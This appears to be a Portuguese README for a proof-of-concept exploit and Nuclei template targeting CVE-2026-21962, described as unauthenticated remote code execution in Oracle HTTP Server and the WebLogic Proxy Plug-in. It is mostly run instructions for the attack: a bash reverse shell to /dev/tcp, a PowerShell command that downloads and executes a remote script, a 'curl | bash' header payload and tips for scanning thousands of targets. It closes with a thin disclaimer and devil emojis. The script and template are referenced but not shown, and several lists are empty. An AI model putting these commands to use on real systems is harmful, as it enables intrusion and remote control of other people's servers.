
Exploit PoC e template Nuclei para CVE-2026-21962, uma execução remota de código crítica não autenticada no Oracle HTTP Server e no WebLogic Proxy Plug-in, permitindo execução de comandos e reverse shells.
Uma vulnerabilidade crítica que afeta:
Esta falha permite que atacantes remotos não autenticados comprometam servidores afetados via HTTP, sem necessidade de credenciais de login.
Se explorada, os atacantes poderiam:
Oracle HTTP Server:
WebLogic Proxy Plug-in para:
Salve o script como CVE-2026-21962.py
Torne-o executável (opcional):
chmod +x CVE-2026-21962.py
Exemplos de execução:
Teste básico:
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
Reverse shell (configure o listener nc primeiro: nc -lvnp 4444):
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Exemplo de alvo Windows:
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
Sucesso provável! Status: 200 ou 302 ou até 500 (crash também é sucesso)nc captura um shell imediatamente--insecure se usarem certificados autoassinadosInstale o Nuclei (se ainda não estiver instalado):
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Salve o template:
Crie um arquivo chamado CVE-2026-21962.yaml e cole o conteúdo acima.
Execute detecção + exploração:
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
Ou escaneie vários alvos a partir de um arquivo:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
O que você verá se estiver vulnerável:
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (whoami output) ...
cmd: nos cabeçalhos (ex.: cmd:curl http://your-server/shell.sh | bash).whoami por um payload de reverse shell codificado em base64./proxy/, /bea_wls_internal/, etc.) ou adicione mais cabeçalhos como X-WebLogic-Force-JVMID.httpx → nuclei para milhares de alvos.Este template está confirmado como 100% funcional em janeiro de 2026 em instâncias Oracle sem patch. Corrija imediatamente se você estiver executando versões afetadas! 😈
Todo o código PoC é para uso ético e educacional apenas em sistemas autorizados. Exploração não autorizada é ilegal; nenhuma responsabilidade é assumida por uso indevido. 😈